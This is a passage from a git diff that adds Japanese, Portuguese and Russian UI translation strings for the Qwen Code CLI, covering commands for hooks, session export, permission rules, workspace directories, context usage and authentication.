tier', + ' Limit: Up to 1,000 requests/day': ' Limit: Up to 1,000 requests/day', + ' Models: Qwen latest models\n': ' Models: Qwen latest models\n', + '✓ Authentication Method: 
Alibaba Cloud Coding Plan': + '✓ Authentication Method: Alibaba Cloud Coding Plan', + '中国 (China) - 阿里云百炼': '中国 (China) - 阿里云百炼', + 'Global - Alibaba Cloud': 'Global - Alibaba Cloud', + ' Region: {{region}}': ' Region: {{region}}', + ' Current Model: {{model}}': ' Current Model: {{model}}', + ' Config Version: {{version}}': ' Config Version: {{version}}', + ' Status: API key configured\n': ' Status: API key configured\n', + '⚠️ Authentication Method: Alibaba Cloud Coding Plan (Incomplete)': + '⚠️ Authentication Method: Alibaba Cloud Coding Plan (Incomplete)', + ' Issue: API key not found in environment or settings\n': + ' Issue: API key not found in environment or settings\n', + ' Run `qwen auth coding-plan` to re-configure.\n': + ' Run `qwen auth coding-plan` to re-configure.\n', + '✓ Authentication Method: {{type}}': '✓ Authentication Method: {{type}}', + ' Status: Configured\n': ' Status: Configured\n', + 'Failed to check authentication status: {{error}}': + 'Failed to check authentication status: {{error}}', + 'Select an option:': 'Select an option:', + 'Raw mode not available. Please run in an interactive terminal.': + 'Raw mode not available. Please run in an interactive terminal.', + '(Use ↑ ↓ arrows to navigate, Enter to select, Ctrl+C to exit)\n': + '(Use ↑ ↓ arrows to navigate, Enter to select, Ctrl+C to exit)\n', }; diff --git a/packages/cli/src/i18n/locales/ja.js b/packages/cli/src/i18n/locales/ja.js index 02898e8bc..b06a6fdef 100644 --- a/packages/cli/src/i18n/locales/ja.js +++ b/packages/cli/src/i18n/locales/ja.js @@ -85,6 +85,7 @@ export default { 'プロジェクトを分析し、カスタマイズされた QWEN.md ファイルを作成', 'List available Qwen Code tools. 
Usage: /tools [desc]': '利用可能な Qwen Code ツールを一覧表示。使い方: /tools [desc]', + 'List available skills.': '利用可能なスキルを一覧表示する。', 'Available Qwen Code CLI tools:': '利用可能な Qwen Code CLI ツール:', 'No tools available': '利用可能なツールはありません', 'View or change the approval mode for tool usage': @@ -328,6 +329,7 @@ export default { 'ワークスペース内のすべてのディレクトリを表示', 'set external editor preference': '外部エディタの設定', 'Manage extensions': '拡張機能を管理', + 'Manage installed extensions': 'インストール済みの拡張機能を管理する', 'List active extensions': '有効な拡張機能を一覧表示', 'Update extensions. Usage: update |--all': '拡張機能を更新。使い方: update <拡張機能名>|--all', @@ -371,6 +373,38 @@ export default { '{{terminalName}} の設定に失敗しました', 'Your terminal is already configured for an optimal experience with multiline input (Shift+Enter and Ctrl+Enter).': 'ターミナルは複数行入力(Shift+Enter と Ctrl+Enter)に最適化されています', + // ============================================================================ + // Commands - Hooks + // ============================================================================ + 'Manage Qwen Code hooks': 'Qwen Code のフックを管理する', + 'List all configured hooks': '設定済みのフックをすべて表示する', + 'Enable a disabled hook': '無効なフックを有効にする', + 'Disable an active hook': '有効なフックを無効にする', + + // ============================================================================ + // Commands - Session Export + // ============================================================================ + 'Export current session message history to a file': + '現在のセッションのメッセージ履歴をファイルにエクスポートする', + 'Export session to HTML format': 'セッションを HTML 形式でエクスポートする', + 'Export session to JSON format': 'セッションを JSON 形式でエクスポートする', + 'Export session to JSONL format (one message per line)': + 'セッションを JSONL 形式でエクスポートする(1 行に 1 メッセージ)', + 'Export session to markdown format': + 'セッションを Markdown 形式でエクスポートする', + + // ============================================================================ + // Commands - Insights + // ============================================================================ + 'generate 
personalized programming insights from your chat history': + 'チャット履歴からパーソナライズされたプログラミングインサイトを生成する', + + // ============================================================================ + // Commands - Session History + // ============================================================================ + 'Resume a previous session': '前のセッションを再開する', + 'Restore a tool call. This will reset the conversation and file history to the state it was in when the tool call was suggested': + 'ツール呼び出しを復元します。これにより、会話とファイルの履歴はそのツール呼び出しが提案された時点の状態に戻ります', 'Could not detect terminal type. Supported terminals: VS Code, Cursor, Windsurf, and Trae.': 'ターミナルの種類を検出できませんでした。サポートされているターミナル: VS Code、Cursor、Windsurf、Trae', 'Terminal "{{terminal}}" is not supported yet.': @@ -751,6 +785,8 @@ export default { 'No, suggest changes (esc)': 'いいえ、変更を提案 (Esc)', "Allow execution of: '{{command}}'?": "'{{command}}' の実行を許可しますか?", 'Yes, allow always ...': 'はい、常に許可...', + 'Always allow in this project': 'このプロジェクトで常に許可', + 'Always allow for this user': 'このユーザーに常に許可', 'Yes, and auto-accept edits': 'はい、編集を自動承認', 'Yes, and manually approve edits': 'はい、編集を手動承認', 'No, keep planning (esc)': 'いいえ、計画を続ける (Esc)', @@ -871,6 +907,73 @@ export default { 'Alibaba Cloud ModelStudioの最新Qwen Visionモデル(バージョン: qwen3-vl-plus-2025-09-23)', // Dialogs - Permissions 'Manage folder trust settings': 'フォルダ信頼設定を管理', + 'Manage permission rules': '権限ルールを管理', + Allow: '許可', + Ask: '確認', + Deny: '拒否', + Workspace: 'ワークスペース', + "Qwen Code won't ask before using allowed tools.": + 'Qwen Code は許可されたツールを使用する前に確認しません。', + 'Qwen Code will ask before using these tools.': + 'Qwen Code はこれらのツールを使用する前に確認します。', + 'Qwen Code is not allowed to use denied tools.': + 'Qwen Code は拒否されたツールを使用できません。', + 'Manage trusted directories for this workspace.': + 'このワークスペースの信頼済みディレクトリを管理します。', + 'Any use of the {{tool}} tool': '{{tool}} ツールのすべての使用', + "{{tool}} commands matching '{{pattern}}'": + "'{{pattern}}' に一致する {{tool}} コマンド", + 'From user settings': 
'ユーザー設定から', + 'From project settings': 'プロジェクト設定から', + 'From session': 'セッションから', + 'Project settings (local)': 'プロジェクト設定(ローカル)', + 'Saved in .qwen/settings.local.json': '.qwen/settings.local.json に保存', + 'Project settings': 'プロジェクト設定', + 'Checked in at .qwen/settings.json': '.qwen/settings.json にチェックイン', + 'User settings': 'ユーザー設定', + 'Saved in at ~/.qwen/settings.json': '~/.qwen/settings.json に保存', + 'Add a new rule…': '新しいルールを追加…', + 'Add {{type}} permission rule': '{{type}}権限ルールを追加', + 'Permission rules are a tool name, optionally followed by a specifier in parentheses.': + '権限ルールはツール名で、オプションで括弧内に指定子を付けます。', + 'e.g.,': '例:', + or: 'または', + 'Enter permission rule…': '権限ルールを入力…', + 'Enter to submit · Esc to cancel': 'Enter で送信 · Esc でキャンセル', + 'Where should this rule be saved?': 'このルールをどこに保存しますか?', + 'Enter to confirm · Esc to cancel': 'Enter で確認 · Esc でキャンセル', + 'Delete {{type}} rule?': '{{type}}ルールを削除しますか?', + 'Are you sure you want to delete this permission rule?': + 'この権限ルールを削除してもよろしいですか?', + 'Permissions:': '権限:', + '(←/→ or tab to cycle)': '(←/→ または Tab で切替)', + 'Press ↑↓ to navigate · Enter to select · Type to search · Esc to cancel': + '↑↓ でナビゲート · Enter で選択 · 入力で検索 · Esc でキャンセル', + 'Search…': '検索…', + 'Use /trust to manage folder trust settings for this workspace.': + '/trust を使用してこのワークスペースのフォルダ信頼設定を管理します。', + // Workspace directory management + 'Add directory…': 'ディレクトリを追加…', + 'Add directory to workspace': 'ワークスペースにディレクトリを追加', + 'Qwen Code can read files in the workspace, and make edits when auto-accept edits is on.': + 'Qwen Code はワークスペース内のファイルを読み取り、自動編集承認が有効な場合は編集を行えます。', + 'Qwen Code will be able to read files in this directory and make edits when auto-accept edits is on.': + 'Qwen Code はこのディレクトリ内のファイルを読み取り、自動編集承認が有効な場合は編集を行えます。', + 'Enter the path to the directory:': 'ディレクトリのパスを入力してください:', + 'Enter directory path…': 'ディレクトリパスを入力…', + 'Tab to complete · Enter to add · Esc to cancel': + 'Tab で補完 · Enter で追加 · Esc でキャンセル', + 'Remove directory?': 
'ディレクトリを削除しますか?', + 'Are you sure you want to remove this directory from the workspace?': + 'このディレクトリをワークスペースから削除してもよろしいですか?', + ' (Original working directory)': ' (元の作業ディレクトリ)', + ' (from settings)': ' (設定より)', + 'Directory does not exist.': 'ディレクトリが存在しません。', + 'Path is not a directory.': 'パスはディレクトリではありません。', + 'This directory is already in the workspace.': + 'このディレクトリはすでにワークスペースに含まれています。', + 'Already covered by existing directory: {{dir}}': + '既存のディレクトリによって既にカバーされています: {{dir}}', // Status Bar 'Using:': '使用中:', '{{count}} open file': '{{count}} 個のファイルを開いています', @@ -1092,6 +1195,35 @@ export default { '{{region}} の新しいモデル設定が利用可能です。今すぐ更新しますか?', '{{region}} configuration updated successfully. Model switched to "{{model}}".': '{{region}} の設定が正常に更新されました。モデルが "{{model}}" に切り替わりました。', + 'Authenticated successfully with {{region}}. API key and model configs saved to settings.json (backed up).': + '{{region}} での認証に成功しました。API キーとモデル設定が settings.json に保存されました(バックアップ済み)。', + + // ============================================================================ + // Context Usage Component + // ============================================================================ + 'Context Usage': 'コンテキスト使用量', + 'No API response yet. 
Send a message to see actual usage.': + 'API応答はありません。メッセージを送信して実際の使用量を確認してください。', + 'Estimated pre-conversation overhead': '推定事前会話オーバーヘッド', + 'Context window': 'コンテキストウィンドウ', + tokens: 'トークン', + Used: '使用済み', + Free: '空き', + 'Autocompact buffer': '自動圧縮バッファ', + 'Usage by category': 'カテゴリ別の使用量', + 'System prompt': 'システムプロンプト', + 'Built-in tools': '組み込みツール', + 'MCP tools': 'MCPツール', + 'Memory files': 'メモリファイル', + Skills: 'スキル', + Messages: 'メッセージ', + 'Show context window usage breakdown.': + 'コンテキストウィンドウの使用状況を表示します。', + 'Run /context detail for per-item breakdown.': + '/context detail を実行すると項目ごとの内訳を表示します。', + active: '有効', + 'body loaded': '本文読み込み済み', + memory: 'メモリ', '{{region}} configuration updated successfully.': '{{region}} の設定が正常に更新されました。', 'Authenticated successfully with {{region}}. API key and model configs saved to settings.json.': @@ -1125,4 +1257,76 @@ export default { '↑/↓: ナビゲート | Space/Enter: 切り替え | Esc: キャンセル', '↑/↓: Navigate | Enter: Select | Esc: Cancel': '↑/↓: ナビゲート | Enter: 選択 | Esc: キャンセル', + + // ============================================================================ + // Commands - Auth + // ============================================================================ + 'Configure Qwen authentication information with Qwen-OAuth or Alibaba Cloud Coding Plan': + 'Qwen-OAuth または Alibaba Cloud Coding Plan で Qwen 認証情報を設定する', + 'Authenticate using Qwen OAuth': 'Qwen OAuth で認証する', + 'Authenticate using Alibaba Cloud Coding Plan': + 'Alibaba Cloud Coding Plan で認証する', + 'Region for Coding Plan (china/global)': + 'Coding Plan のリージョン (china/global)', + 'API key for Coding Plan': 'Coding Plan の API キー', + 'Show current authentication status': '現在の認証ステータスを表示', + 'Authentication completed successfully.': '認証が正常に完了しました。', + 'Starting Qwen OAuth authentication...': 'Qwen OAuth 認証を開始しています...', + 'Successfully authenticated with Qwen OAuth.': + 'Qwen OAuth での認証に成功しました。', + 'Failed to authenticate with Qwen OAuth: {{error}}': + 'Qwen OAuth での認証に失敗しました: 
{{error}}', + 'Processing Alibaba Cloud Coding Plan authentication...': + 'Alibaba Cloud Coding Plan 認証を処理しています...', + 'Successfully authenticated with Alibaba Cloud Coding Plan.': + 'Alibaba Cloud Coding Plan での認証に成功しました。', + 'Failed to authenticate with Coding Plan: {{error}}': + 'Coding Plan での認証に失敗しました: {{error}}', + '中国 (China)': '中国 (China)', + '阿里云百炼 (aliyun.com)': '阿里云百炼 (aliyun.com)', + Global: 'グローバル', + 'Alibaba Cloud (alibabacloud.com)': 'Alibaba Cloud (alibabacloud.com)', + 'Select region for Coding Plan:': 'Coding Plan のリージョンを選択:', + 'Enter your Coding Plan API key: ': + 'Coding Plan の API キーを入力してください: ', + 'Select authentication method:': '認証方法を選択:', + '\n=== Authentication Status ===\n': '\n=== 認証ステータス ===\n', + '⚠️ No authentication method configured.\n': + '⚠️ 認証方法が設定されていません。\n', + 'Run one of the following commands to get started:\n': + '以下のコマンドのいずれかを実行して開始してください:\n', + ' qwen auth qwen-oauth - Authenticate with Qwen OAuth (free tier)': + ' qwen auth qwen-oauth - Qwen OAuth で認証(無料)', + ' qwen auth coding-plan - Authenticate with Alibaba Cloud Coding Plan\n': + ' qwen auth coding-plan - Alibaba Cloud Coding Plan で認証\n', + 'Or simply run:': 'または以下を実行:', + ' qwen auth - Interactive authentication setup\n': + ' qwen auth - インタラクティブ認証セットアップ\n', + '✓ Authentication Method: Qwen OAuth': '✓ 認証方法: Qwen OAuth', + ' Type: Free tier': ' タイプ: 無料プラン', + ' Limit: Up to 1,000 requests/day': ' 制限: 1日最大1,000リクエスト', + ' Models: Qwen latest models\n': ' モデル: Qwen 最新モデル\n', + '✓ Authentication Method: Alibaba Cloud Coding Plan': + '✓ 認証方法: Alibaba Cloud Coding Plan', + '中国 (China) - 阿里云百炼': '中国 (China) - 阿里云百炼', + 'Global - Alibaba Cloud': 'グローバル - Alibaba Cloud', + ' Region: {{region}}': ' リージョン: {{region}}', + ' Current Model: {{model}}': ' 現在のモデル: {{model}}', + ' Config Version: {{version}}': ' 設定バージョン: {{version}}', + ' Status: API key configured\n': ' ステータス: APIキー設定済み\n', + '⚠️ Authentication Method: Alibaba Cloud Coding Plan (Incomplete)': + '⚠️ 認証方法: Alibaba 
Cloud Coding Plan(不完全)', + ' Issue: API key not found in environment or settings\n': + ' 問題: 環境変数または設定にAPIキーが見つかりません\n', + ' Run `qwen auth coding-plan` to re-configure.\n': + ' `qwen auth coding-plan` を実行して再設定してください。\n', + '✓ Authentication Method: {{type}}': '✓ 認証方法: {{type}}', + ' Status: Configured\n': ' ステータス: 設定済み\n', + 'Failed to check authentication status: {{error}}': + '認証ステータスの確認に失敗しました: {{error}}', + 'Select an option:': 'オプションを選択:', + 'Raw mode not available. Please run in an interactive terminal.': + 'Rawモードが利用できません。インタラクティブターミナルで実行してください。', + '(Use ↑ ↓ arrows to navigate, Enter to select, Ctrl+C to exit)\n': + '(↑ ↓ 矢印キーで移動、Enter で選択、Ctrl+C で終了)\n', }; diff --git a/packages/cli/src/i18n/locales/pt.js b/packages/cli/src/i18n/locales/pt.js index 7492fe5f4..b2240877b 100644 --- a/packages/cli/src/i18n/locales/pt.js +++ b/packages/cli/src/i18n/locales/pt.js @@ -111,6 +111,7 @@ export default { 'Analisa o projeto e cria um arquivo QWEN.md personalizado.', 'List available Qwen Code tools. Usage: /tools [desc]': 'Listar ferramentas Qwen Code disponíveis. Uso: /tools [desc]', + 'List available skills.': 'Listar habilidades disponíveis.', 'Available Qwen Code CLI tools:': 'Ferramentas CLI do Qwen Code disponíveis:', 'No tools available': 'Nenhuma ferramenta disponível', 'View or change the approval mode for tool usage': @@ -401,6 +402,7 @@ export default { 'Estes editores são suportados atualmente. Note que alguns editores não podem ser usados no modo sandbox.', 'Your preferred editor is:': 'Seu editor preferido é:', 'Manage extensions': 'Gerenciar extensões', + 'Manage installed extensions': 'Gerenciar extensões instaladas', 'List active extensions': 'Listar extensões ativas', 'Update extensions. Usage: update |--all': 'Atualizar extensões. 
Uso: update |--all', @@ -590,6 +592,38 @@ export default { 'Falha ao configurar {{terminalName}}.', 'Your terminal is already configured for an optimal experience with multiline input (Shift+Enter and Ctrl+Enter).': 'Seu terminal já está configurado para uma experiência ideal com entrada multilinhas (Shift+Enter e Ctrl+Enter).', + // ============================================================================ + // Commands - Hooks + // ============================================================================ + 'Manage Qwen Code hooks': 'Gerenciar hooks do Qwen Code', + 'List all configured hooks': 'Listar todos os hooks configurados', + 'Enable a disabled hook': 'Ativar um hook desativado', + 'Disable an active hook': 'Desativar um hook ativo', + + // ============================================================================ + // Commands - Session Export + // ============================================================================ + 'Export current session message history to a file': + 'Exportar o histórico de mensagens da sessão atual para um arquivo', + 'Export session to HTML format': 'Exportar a sessão para o formato HTML', + 'Export session to JSON format': 'Exportar a sessão para o formato JSON', + 'Export session to JSONL format (one message per line)': + 'Exportar a sessão para o formato JSONL (uma mensagem por linha)', + 'Export session to markdown format': + 'Exportar a sessão para o formato Markdown', + + // ============================================================================ + // Commands - Insights + // ============================================================================ + 'generate personalized programming insights from your chat history': + 'Gerar insights personalizados de programação a partir do seu histórico de chat', + + // ============================================================================ + // Commands - Session History + // ============================================================================ + 'Resume 
a previous session': 'Retomar uma sessão anterior', + 'Restore a tool call. This will reset the conversation and file history to the state it was in when the tool call was suggested': + 'Restaurar uma chamada de ferramenta. Isso redefinirá o histórico da conversa e dos arquivos para o estado em que a chamada da ferramenta foi sugerida', 'Could not detect terminal type. Supported terminals: VS Code, Cursor, Windsurf, and Trae.': 'Não foi possível detectar o tipo de terminal. Terminais suportados: VS Code, Cursor, Windsurf e Trae.', 'Terminal "{{terminal}}" is not supported yet.': @@ -1019,6 +1053,8 @@ export default { "Allow execution of: '{{command}}'?": "Permitir a execução de: '{{command}}'?", 'Yes, allow always ...': 'Sim, permitir sempre ...', + 'Always allow in this project': 'Sempre permitir neste projeto', + 'Always allow for this user': 'Sempre permitir para este usuário', 'Yes, and auto-accept edits': 'Sim, e aceitar edições automaticamente', 'Yes, and manually approve edits': 'Sim, e aprovar edições manualmente', 'No, keep planning (esc)': 'Não, continuar planejando (esc)', @@ -1185,6 +1221,74 @@ export default { // ============================================================================ 'Manage folder trust settings': 'Gerenciar configurações de confiança de pasta', + 'Manage permission rules': 'Gerenciar regras de permissão', + Allow: 'Permitir', + Ask: 'Perguntar', + Deny: 'Negar', + Workspace: 'Área de trabalho', + "Qwen Code won't ask before using allowed tools.": + 'O Qwen Code não perguntará antes de usar ferramentas permitidas.', + 'Qwen Code will ask before using these tools.': + 'O Qwen Code perguntará antes de usar essas ferramentas.', + 'Qwen Code is not allowed to use denied tools.': + 'O Qwen Code não tem permissão para usar ferramentas negadas.', + 'Manage trusted directories for this workspace.': + 'Gerenciar diretórios confiáveis para esta área de trabalho.', + 'Any use of the {{tool}} tool': 'Qualquer uso da ferramenta {{tool}}', + 
"{{tool}} commands matching '{{pattern}}'": + "Comandos {{tool}} correspondentes a '{{pattern}}'", + 'From user settings': 'Das configurações do usuário', + 'From project settings': 'Das configurações do projeto', + 'From session': 'Da sessão', + 'Project settings (local)': 'Configurações do projeto (local)', + 'Saved in .qwen/settings.local.json': 'Salvo em .qwen/settings.local.json', + 'Project settings': 'Configurações do projeto', + 'Checked in at .qwen/settings.json': 'Registrado em .qwen/settings.json', + 'User settings': 'Configurações do usuário', + 'Saved in at ~/.qwen/settings.json': 'Salvo em ~/.qwen/settings.json', + 'Add a new rule…': 'Adicionar nova regra…', + 'Add {{type}} permission rule': 'Adicionar regra de permissão {{type}}', + 'Permission rules are a tool name, optionally followed by a specifier in parentheses.': + 'Regras de permissão são um nome de ferramenta, opcionalmente seguido por um especificador entre parênteses.', + 'e.g.,': 'ex.', + or: 'ou', + 'Enter permission rule…': 'Insira a regra de permissão…', + 'Enter to submit · Esc to cancel': 'Enter para enviar · Esc para cancelar', + 'Where should this rule be saved?': 'Onde esta regra deve ser salva?', + 'Enter to confirm · Esc to cancel': + 'Enter para confirmar · Esc para cancelar', + 'Delete {{type}} rule?': 'Excluir regra {{type}}?', + 'Are you sure you want to delete this permission rule?': + 'Tem certeza de que deseja excluir esta regra de permissão?', + 'Permissions:': 'Permissões:', + '(←/→ or tab to cycle)': '(←/→ ou Tab para alternar)', + 'Press ↑↓ to navigate · Enter to select · Type to search · Esc to cancel': + '↑↓ para navegar · Enter para selecionar · Digite para pesquisar · Esc para cancelar', + 'Search…': 'Pesquisar…', + 'Use /trust to manage folder trust settings for this workspace.': + 'Use /trust para gerenciar as configurações de confiança de pasta desta área de trabalho.', + // Workspace directory management + 'Add directory…': 'Adicionar diretório…', + 'Add 
directory to workspace': 'Adicionar diretório à área de trabalho', + 'Qwen Code can read files in the workspace, and make edits when auto-accept edits is on.': + 'O Qwen Code pode ler arquivos na área de trabalho e fazer edições quando a aceitação automática está ativada.', + 'Qwen Code will be able to read files in this directory and make edits when auto-accept edits is on.': + 'O Qwen Code poderá ler arquivos neste diretório e fazer edições quando a aceitação automática está ativada.', + 'Enter the path to the directory:': 'Insira o caminho do diretório:', + 'Enter directory path…': 'Insira o caminho do diretório…', + 'Tab to complete · Enter to add · Esc to cancel': + 'Tab para completar · Enter para adicionar · Esc para cancelar', + 'Remove directory?': 'Remover diretório?', + 'Are you sure you want to remove this directory from the workspace?': + 'Tem certeza de que deseja remover este diretório da área de trabalho?', + ' (Original working directory)': ' (Diretório de trabalho original)', + ' (from settings)': ' (das configurações)', + 'Directory does not exist.': 'O diretório não existe.', + 'Path is not a directory.': 'O caminho não é um diretório.', + 'This directory is already in the workspace.': + 'Este diretório já está na área de trabalho.', + 'Already covered by existing directory: {{dir}}': + 'Já coberto pelo diretório existente: {{dir}}', // ============================================================================ // Status Bar @@ -1581,6 +1685,35 @@ export default { 'Novas configurações de modelo estão disponíveis para o {{region}}. Atualizar agora?', '{{region}} configuration updated successfully. Model switched to "{{model}}".': 'Configuração do {{region}} atualizada com sucesso. Modelo alterado para "{{model}}".', + 'Authenticated successfully with {{region}}. API key and model configs saved to settings.json (backed up).': + 'Autenticado com sucesso com {{region}}. 
Chave de API e configurações de modelo salvas em settings.json (com backup).', + + // ============================================================================ + // Context Usage Component + // ============================================================================ + 'Context Usage': 'Uso do Contexto', + 'No API response yet. Send a message to see actual usage.': + 'Ainda não há resposta da API. Envie uma mensagem para ver o uso real.', + 'Estimated pre-conversation overhead': 'Sobrecarga estimada pré-conversa', + 'Context window': 'Janela de Contexto', + tokens: 'tokens', + Used: 'Usado', + Free: 'Livre', + 'Autocompact buffer': 'Buffer de autocompactação', + 'Usage by category': 'Uso por categoria', + 'System prompt': 'Prompt do sistema', + 'Built-in tools': 'Ferramentas integradas', + 'MCP tools': 'Ferramentas MCP', + 'Memory files': 'Arquivos de memória', + Skills: 'Habilidades', + Messages: 'Mensagens', + 'Show context window usage breakdown.': + 'Exibe a divisão de uso da janela de contexto.', + 'Run /context detail for per-item breakdown.': + 'Execute /context detail para detalhamento por item.', + active: 'ativo', + 'body loaded': 'conteúdo carregado', + memory: 'memória', '{{region}} configuration updated successfully.': 'Configuração do {{region}} atualizada com sucesso.', 'Authenticated successfully with {{region}}. 
API key and model configs saved to settings.json.': @@ -1616,4 +1749,78 @@ export default { '↑/↓: Navegar | Space/Enter: Alternar | Esc: Cancelar', '↑/↓: Navigate | Enter: Select | Esc: Cancel': '↑/↓: Navegar | Enter: Selecionar | Esc: Cancelar', + + // ============================================================================ + // Commands - Auth + // ============================================================================ + 'Configure Qwen authentication information with Qwen-OAuth or Alibaba Cloud Coding Plan': + 'Configurar autenticação Qwen com Qwen-OAuth ou Alibaba Cloud Coding Plan', + 'Authenticate using Qwen OAuth': 'Autenticar usando Qwen OAuth', + 'Authenticate using Alibaba Cloud Coding Plan': + 'Autenticar usando Alibaba Cloud Coding Plan', + 'Region for Coding Plan (china/global)': + 'Região para Coding Plan (china/global)', + 'API key for Coding Plan': 'Chave de API para Coding Plan', + 'Show current authentication status': 'Mostrar status atual de autenticação', + 'Authentication completed successfully.': + 'Autenticação concluída com sucesso.', + 'Starting Qwen OAuth authentication...': + 'Iniciando autenticação Qwen OAuth...', + 'Successfully authenticated with Qwen OAuth.': + 'Autenticado com sucesso via Qwen OAuth.', + 'Failed to authenticate with Qwen OAuth: {{error}}': + 'Falha ao autenticar com Qwen OAuth: {{error}}', + 'Processing Alibaba Cloud Coding Plan authentication...': + 'Processando autenticação Alibaba Cloud Coding Plan...', + 'Successfully authenticated with Alibaba Cloud Coding Plan.': + 'Autenticado com sucesso via Alibaba Cloud Coding Plan.', + 'Failed to authenticate with Coding Plan: {{error}}': + 'Falha ao autenticar com Coding Plan: {{error}}', + '中国 (China)': '中国 (China)', + '阿里云百炼 (aliyun.com)': '阿里云百炼 (aliyun.com)', + Global: 'Global', + 'Alibaba Cloud (alibabacloud.com)': 'Alibaba Cloud (alibabacloud.com)', + 'Select region for Coding Plan:': 'Selecione a região para Coding Plan:', + 'Enter your Coding Plan API 
key: ': + 'Insira sua chave de API do Coding Plan: ', + 'Select authentication method:': 'Selecione o método de autenticação:', + '\n=== Authentication Status ===\n': '\n=== Status de Autenticação ===\n', + '⚠️ No authentication method configured.\n': + '⚠️ Nenhum método de autenticação configurado.\n', + 'Run one of the following commands to get started:\n': + 'Execute um dos seguintes comandos para começar:\n', + ' qwen auth qwen-oauth - Authenticate with Qwen OAuth (free tier)': + ' qwen auth qwen-oauth - Autenticar com Qwen OAuth (gratuito)', + ' qwen auth coding-plan - Authenticate with Alibaba Cloud Coding Plan\n': + ' qwen auth coding-plan - Autenticar com Alibaba Cloud Coding Plan\n', + 'Or simply run:': 'Ou simplesmente execute:', + ' qwen auth - Interactive authentication setup\n': + ' qwen auth - Configuração interativa de autenticação\n', + '✓ Authentication Method: Qwen OAuth': '✓ Método de autenticação: Qwen OAuth', + ' Type: Free tier': ' Tipo: Gratuito', + ' Limit: Up to 1,000 requests/day': ' Limite: Até 1.000 solicitações/dia', + ' Models: Qwen latest models\n': ' Modelos: Modelos Qwen mais recentes\n', + '✓ Authentication Method: Alibaba Cloud Coding Plan': + '✓ Método de autenticação: Alibaba Cloud Coding Plan', + '中国 (China) - 阿里云百炼': '中国 (China) - 阿里云百炼', + 'Global - Alibaba Cloud': 'Global - Alibaba Cloud', + ' Region: {{region}}': ' Região: {{region}}', + ' Current Model: {{model}}': ' Modelo atual: {{model}}', + ' Config Version: {{version}}': ' Versão da configuração: {{version}}', + ' Status: API key configured\n': ' Status: Chave de API configurada\n', + '⚠️ Authentication Method: Alibaba Cloud Coding Plan (Incomplete)': + '⚠️ Método de autenticação: Alibaba Cloud Coding Plan (Incompleto)', + ' Issue: API key not found in environment or settings\n': + ' Problema: Chave de API não encontrada no ambiente ou configurações\n', + ' Run `qwen auth coding-plan` to re-configure.\n': + ' Execute `qwen auth coding-plan` para reconfigurar.\n', + '✓ 
Authentication Method: {{type}}': '✓ Método de autenticação: {{type}}', + ' Status: Configured\n': ' Status: Configurado\n', + 'Failed to check authentication status: {{error}}': + 'Falha ao verificar status de autenticação: {{error}}', + 'Select an option:': 'Selecione uma opção:', + 'Raw mode not available. Please run in an interactive terminal.': + 'Modo raw não disponível. Execute em um terminal interativo.', + '(Use ↑ ↓ arrows to navigate, Enter to select, Ctrl+C to exit)\n': + '(Use ↑ ↓ para navegar, Enter para selecionar, Ctrl+C para sair)\n', }; diff --git a/packages/cli/src/i18n/locales/ru.js b/packages/cli/src/i18n/locales/ru.js index 66cf2791d..c3ae5953a 100644 --- a/packages/cli/src/i18n/locales/ru.js +++ b/packages/cli/src/i18n/locales/ru.js @@ -119,6 +119,7 @@ export default { 'Анализ проекта и создание адаптированного файла QWEN.md', 'List available Qwen Code tools. Usage: /tools [desc]': 'Просмотр доступных инструментов Qwen Code. Использование: /tools [desc]', + 'List available skills.': 'Показать доступные навыки.', 'Available Qwen Code CLI tools:': 'Доступные инструменты Qwen Code CLI:', 'No tools available': 'Нет доступных инструментов', 'View or change the approval mode for tool usage': @@ -398,6 +399,7 @@ export default { 'В настоящее время поддерживаются следующие редакторы. Обратите внимание, что некоторые редакторы нельзя использовать в режиме песочницы.', 'Your preferred editor is:': 'Ваш предпочитаемый редактор:', 'Manage extensions': 'Управление расширениями', + 'Manage installed extensions': 'Управлять установленными расширениями', 'List active extensions': 'Показать активные расширения', 'Update extensions. Usage: update |--all': 'Обновить расширения. 
Использование: update |--all', @@ -596,6 +598,38 @@ export default { 'Не удалось настроить {{terminalName}}.', 'Your terminal is already configured for an optimal experience with multiline input (Shift+Enter and Ctrl+Enter).': 'Ваш терминал уже настроен для оптимальной работы с многострочным вводом (Shift+Enter и Ctrl+Enter).', + // ============================================================================ + // Commands - Hooks + // ============================================================================ + 'Manage Qwen Code hooks': 'Управлять хуками Qwen Code', + 'List all configured hooks': 'Показать все настроенные хуки', + 'Enable a disabled hook': 'Включить отключенный хук', + 'Disable an active hook': 'Отключить активный хук', + + // ============================================================================ + // Commands - Session Export + // ============================================================================ + 'Export current session message history to a file': + 'Экспортировать историю сообщений текущей сессии в файл', + 'Export session to HTML format': 'Экспортировать сессию в формат HTML', + 'Export session to JSON format': 'Экспортировать сессию в формат JSON', + 'Export session to JSONL format (one message per line)': + 'Экспортировать сессию в формат JSONL (одно сообщение на строку)', + 'Export session to markdown format': + 'Экспортировать сессию в формат Markdown', + + // ============================================================================ + // Commands - Insights + // ============================================================================ + 'generate personalized programming insights from your chat history': + 'Создать персонализированные инсайты по программированию на основе истории чата', + + // ============================================================================ + // Commands - Session History + // ============================================================================ + 'Resume a previous session': 
'Продолжить предыдущую сессию', + 'Restore a tool call. This will reset the conversation and file history to the state it was in when the tool call was suggested': + 'Восстановить вызов инструмента. Это вернет историю разговора и файлов к состоянию на момент, когда был предложен этот вызов инструмента', 'Could not detect terminal type. Supported terminals: VS Code, Cursor, Windsurf, and Trae.': 'Не удалось определить тип терминала. Поддерживаемые терминалы: VS Code, Cursor, Windsurf и Trae.', 'Terminal "{{terminal}}" is not supported yet.': @@ -944,6 +978,8 @@ export default { 'No, suggest changes (esc)': 'Нет, предложить изменения (esc)', "Allow execution of: '{{command}}'?": "Разрешить выполнение: '{{command}}'?", 'Yes, allow always ...': 'Да, всегда разрешать ...', + 'Always allow in this project': 'Всегда разрешать в этом проекте', + 'Always allow for this user': 'Всегда разрешать для этого пользователя', 'Yes, and auto-accept edits': 'Да, и автоматически принимать правки', 'Yes, and manually approve edits': 'Да, и вручную подтверждать правки', 'No, keep planning (esc)': 'Нет, продолжить планирование (esc)', @@ -1108,6 +1144,74 @@ export default { // Диалоги - Разрешения // ============================================================================ 'Manage folder trust settings': 'Управление настройками доверия к папкам', + 'Manage permission rules': 'Управление правилами разрешений', + Allow: 'Разрешить', + Ask: 'Спросить', + Deny: 'Запретить', + Workspace: 'Рабочая область', + "Qwen Code won't ask before using allowed tools.": + 'Qwen Code не будет спрашивать перед использованием разрешённых инструментов.', + 'Qwen Code will ask before using these tools.': + 'Qwen Code спросит перед использованием этих инструментов.', + 'Qwen Code is not allowed to use denied 